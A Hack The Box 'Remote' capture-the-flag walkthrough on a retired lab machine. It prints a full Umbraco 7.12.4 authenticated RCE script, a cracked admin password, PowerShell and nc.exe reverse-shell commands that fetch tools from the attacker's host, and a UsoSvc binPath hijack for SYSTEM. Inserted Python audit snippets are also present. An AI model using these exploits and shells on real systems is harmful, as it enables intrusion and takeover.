Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Remote

0 - Basic info

OS: Windows


1 - Reconnaissance

sudo nmap -sS -sV -sC -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 18:14 CEST
Nmap scan report for
Host is up (0.039s latency).
Not shown: 993 closed ports
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-28T16:15:33
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.45 seconds

Interesting: FTP on port 21 with anonymous login enabled, RPC with NFS exports, and port 80 serving a site.

Testing the anonymous FTP login

Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.

Nothing useful was inside.

Testing shares

sudo showmount -e
Export list for
/site_backups (everyone)
mkdir /tmp/mounted
sudo mount --types nfs  /tmp/mounted
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

So we have a backup of a website built with something called Umbraco; a quick search shows that Umbraco is a CMS.


Searching inside the folders, there is an interesting file, web.config:

      <smtp from="noreply@example.com">
         <network host="" userName="username" password="password" />

So there is a user with the credentials username/password.

Umbraco version:

<add key="umbracoConfigurationStatus" value="7.12.4" />

So the Umbraco version is 7.12.4
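As an added example (not code from the original writeup), a small Python audit of a web.config backup for the two findings above, the plaintext SMTP credentials and the Umbraco version; the XML below is constructed from the two fragments quoted on this page, not the full file.

```python
import xml.etree.ElementTree as ET

# Constructed from the two web.config fragments quoted above (not the full file).
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="umbracoConfigurationStatus" value="7.12.4" />
  </appSettings>
  <system.net>
    <mailSettings>
      <smtp from="noreply@example.com">
        <network host="" userName="username" password="password" />
      </smtp>
    </mailSettings>
  </system.net>
</configuration>
"""


def audit_web_config(xml_text):
    """Return (severity, message) findings for an Umbraco web.config."""
    root = ET.fromstring(xml_text)
    findings = []
    # The CMS version is a plain appSetting, so a leaked backup reveals it verbatim.
    for add in root.iter("add"):
        if add.get("key") == "umbracoConfigurationStatus":
            version = add.get("value", "")
            findings.append(("info", f"Umbraco version {version}"))
            if version == "7.12.4":
                findings.append(("high", "7.12.4 has a public authenticated RCE (EDB-ID 46153)"))
    # <network> under mailSettings carries the SMTP account; a non-empty
    # password attribute means the credential is stored in the clear.
    for net in root.iter("network"):
        if net.get("password"):
            findings.append(("high", f"plaintext SMTP credentials "
                                     f"{net.get('userName')}/{net.get('password')}"))
    return findings
```

On a live IIS host the mailSettings section can be encrypted with aspnet_regiis -pe, so a copied backup would not expose the password in the clear.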

2 - Vulnerability Identification

searchsploit umbraco
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)            | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution     | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting     | php/webapps/44988.txt
--------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

So it is a vulnerable version, but the exploit needs authentication, so a user/password is required.

Dumping data

Also inside /App_Data there are interesting files:

cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf
file Umbraco.sdf 
Umbraco.sdf: data
head Umbraco.sdf 
g����Z�x�������ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32��#���0�▒ A$C=H�DY^`FnyPH���I�� K��PM��
strings Umbraco.sdf > /home/u915/Escritorio/umbracoDB.txt

cat /home/u915/Escritorio/umbracoDB.txt


Cracking the hash

Interesting hashes:


Focus on the SHA1 hash, because it is easy to crack:


Using https://md5decrypt.net because I am lazy.

The SHA1 hash decodes to:

b8be16afba8c314ad33d812f22a04991b90e2aaa : baconandcheese

so it is:

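As an added example (not code from the writeup), a Python audit over the `strings` output of Umbraco.sdf that classifies each membership record by the hash algorithm marker next to it and confirms why the SHA1 one was easy: it is an unsalted sha1(password). The ssmith record is the one visible in the head output above, the admin record is constructed around the cracked hash, and the salt/hash layout for HMACSHA256 is an assumption.

```python
import hashlib
import re

# Constructed sample in the glued form `strings` produces for this file: the
# ssmith record is the one in the head output above, the admin record is built
# around the cracked SHA1 hash from the writeup.
SAMPLE_STRINGS = (
    'ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg=='
    'RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}'
    'ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32\n'
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa'
    '{"hashAlgorithm":"SHA1"}admin@htb.localen-US\n'
)

# As seen in the dump, a JSON marker follows each stored password.
MARKER = re.compile(r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}')
# Assumed stored layouts: legacy SHA1 is 40 hex digits; HMACSHA256 is a
# base64 16-byte salt followed by the base64 32-byte digest.
LAYOUT = {
    "SHA1": re.compile(r'(?P<hash>[0-9a-fA-F]{40})$'),
    "HMACSHA256": re.compile(r'(?P<salt>[A-Za-z0-9+/]{22}==)(?P<hash>[A-Za-z0-9+/]{43}=)$'),
}
# The login name is glued in front of the e-mail ("ssmithssmith@"), so a
# repeated local part is skipped before the address itself is taken.
TRAILING_EMAIL = re.compile(
    r'(?:(?P<dup>[A-Za-z0-9._-]+)(?=(?P=dup)@))?(?P<email>[A-Za-z0-9._-]+@[A-Za-z0-9.-]+)$')


def extract_accounts(strings_output):
    """Return [(email, algorithm, stored_hash)] for each marker in the dump."""
    accounts, pos = [], 0
    for m in MARKER.finditer(strings_output):
        chunk, pos = strings_output[pos:m.start()], m.end()
        layout = LAYOUT.get(m.group("alg"))
        cred = layout.search(chunk) if layout else None
        if cred is None:
            continue  # unknown algorithm or layout: report nothing rather than guess
        who = TRAILING_EMAIL.search(chunk[:cred.start()])
        accounts.append((who.group("email") if who else "?", m.group("alg"), cred.group("hash")))
    return accounts


def weak_accounts(strings_output):
    """Accounts still stored as unsalted SHA1, which a plain hash lookup reverses."""
    return [a for a in extract_accounts(strings_output) if a[1] == "SHA1"]


def matches_unsalted_sha1(stored_hex, candidate):
    """True when the stored value is literally sha1(password) with no salt."""
    return hashlib.sha1(candidate.encode()).hexdigest() == stored_hex.lower()
```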

Testing the credentials

Following the paths seen in the web backup, there is a login page:


The credentials work:


3 - Exploit

Using the exploit

searchsploit -m 46153
  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Custom exploit

It is a remote code execution, so the goal is to get a reverse shell; this time I used powercat.

The tactic is to run powershell.exe with arguments that download powercat from my machine (served by a Python HTTP server) and then use it to connect back to my machine on port 1337:

proc.StartInfo.FileName = "powershell.exe";
proc.StartInfo.Arguments = "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 1337 -e cmd";

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A

import requests
from bs4 import BeautifulSoup


def print_dict(dico):
    # Debug helper from the original exploit: dumps a cookie jar
    print(dict(dico))


# The original PoC runs calc.exe; here the C# script block inside the XSLT
# starts powershell.exe, which downloads powercat from my web server (URL
# redacted) and connects back to port 1337. The csharp_user prefix named in
# implements-prefix has to be declared as a namespace on the stylesheet.
payload = '''<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"> \
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 1337 -e cmd";\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> '''

login = "admin@htb.local"
password = "baconandcheese"   # cracked from the SHA1 hash above
host = ""                     # http://<target>, redacted in this writeup

# Step 1 - Get Main page
s = requests.session()
url_main = host + "/umbraco/"
r1 = s.get(url_main)

# Step 2 - Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)

# Step 3 - Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
# The backoffice sets an anti-forgery cookie that must be echoed back as a header
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {"__EVENTTARGET": "", "__EVENTARGUMENT": "",
        "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
        "ctl00$body$xsltSelection": payload,
        "ctl00$body$contentPicker$ContentIdValue": "",
        "ctl00$body$visualizeDo": "Visualize+XSLT"}

# Step 4 - Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)


Setting up listeners

A Python http.server on port 80 (sudo required) serves powercat.ps1 for the PowerShell DownloadString call:

sudo python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [28/Jul/2020 20:00:55] "GET /powercat.ps1 HTTP/1.1" 200 -

And the nc listener:

nc -lvp 1337

Using the exploit and user flag

python exploit.py

The reverse shell succeeds, with the user REMOTE.

Inside the path c:\Users\Public the user flag is available:

c:\Users\Public>type user.txt
type user.txt

4 - Post-Exploitation privilege escalation

Now the mission is to get administrator privileges, and to do that it is necessary to enumerate more. After a lot of research I will post only the vector that worked.

c:\inetpub>net user
net user

User accounts for \\

Administrator            DefaultAccount           Guest                    
The command completed with one or more errors.


With PowerShell, download the PowerUp script from my machine (Python HTTP server listening) to enumerate the machine:

Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Public\Documents> IEX(New-Object Net.WebClient).downloadString('')
IEX(New-Object Net.WebClient).downloadString('')
PS C:\Users\Public\Documents> Invoke-AllChecks

[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

[*] Checking %PATH% for potentially hijackable DLL locations...
[*] Checking for AlwaysInstallElevated registry key...Test-Path : Access is denied
At line:856 char:46
+ ...                  if($ParentPath -and (Test-Path -Path $ParentPath)) {
+                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\syst...Local\Microsoft:String) [Test-Path], UnauthorizedAc 
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.TestPathCommand
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

So there is a service that can be exploited:

Invoke-ServiceAbuse -Name 'UsoSvc': the idea is to use the service to spawn a reverse shell to my machine.

Using UsoSvc

Downloading nc.exe to generate another reverse shell:

Invoke-WebRequest -UseBasicParsing -OutFile nc.exe
PS C:\Users\Public\Documents> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "C:\Users\Public\Documents\nc.exe 1338 -e cmd.exe"
Invoke-ServiceAbuse -Name 'UsoSvc' -Command "C:\Users\Public\Documents\nc.exe 1338 -e cmd.exe"

It does not work as expected using these paths…

Changing the port, using another path and setting it as the service binPath, so that the service executes the downloaded nc.exe:

sc.exe config usosvc binPath="C:\Windows\Temp\nc.exe 9987 -e powershell.exe"
[SC] ChangeServiceConfig SUCCESS

Stopping the service so that the new binPath runs on the next start:

PS C:\Users\Public\Documents> sc.exe stop usosvc

        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

Setting up a listener

rlwrap nc -nvlp 9987
listening on [any] 9987 ...

Starting the service triggers the reverse shell:

PS C:\Users\Public\Documents> sc.exe start usosvc
sc.exe start usosvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

It seems to have failed, but…

connect to [] from (UNKNOWN) [] 49865
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
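As an added example (not part of the writeup), a Python check that parses `sc.exe qc` output and flags the binPath swap performed above: the expected UsoSvc path is the one PowerUp printed on this page, and the sample output is constructed in the layout sc.exe prints, with the tampered path from the sc.exe config command.

```python
import re

# Expected configuration for the service abused above; the binPath is the one
# PowerUp printed for UsoSvc on this page.
EXPECTED = {
    "usosvc": {
        "BINARY_PATH_NAME": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
        "SERVICE_START_NAME": "LocalSystem",
    },
}
# Locations any local user can write to; a LocalSystem service must not run from them.
USER_WRITABLE = ("c:\\windows\\temp\\", "c:\\users\\")

# Constructed in the layout `sc.exe qc usosvc` prints, after the binPath swap above.
TAMPERED_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 30  WIN32
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\Temp\nc.exe 9987 -e powershell.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
"""
BASELINE_QC = TAMPERED_QC.replace(r"C:\Windows\Temp\nc.exe 9987 -e powershell.exe",
                                  EXPECTED["usosvc"]["BINARY_PATH_NAME"])


def parse_sc_qc(text):
    """Turn `sc.exe qc` output into {FIELD: value}."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def audit_service(text):
    """List deviations from the baseline plus the generic user-writable-path flag."""
    cfg = parse_sc_qc(text)
    name = cfg.get("SERVICE_NAME", "").lower()
    findings = []
    for field, want in EXPECTED.get(name, {}).items():
        if cfg.get(field, "").lower() != want.lower():
            findings.append(f"{name}: {field} is '{cfg.get(field, '')}', expected '{want}'")
    path = cfg.get("BINARY_PATH_NAME", "").lower()
    exe = path.split('"')[1] if path.startswith('"') else path.split(" ")[0]
    if cfg.get("SERVICE_START_NAME") == "LocalSystem" and exe.startswith(USER_WRITABLE):
        findings.append(f"{name}: LocalSystem service runs from user-writable path {exe}")
    return findings
```

The same comparison works against the PathName and StartName properties of Get-CimInstance Win32_Service when scripting it in PowerShell on the host.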

Thanks for reading!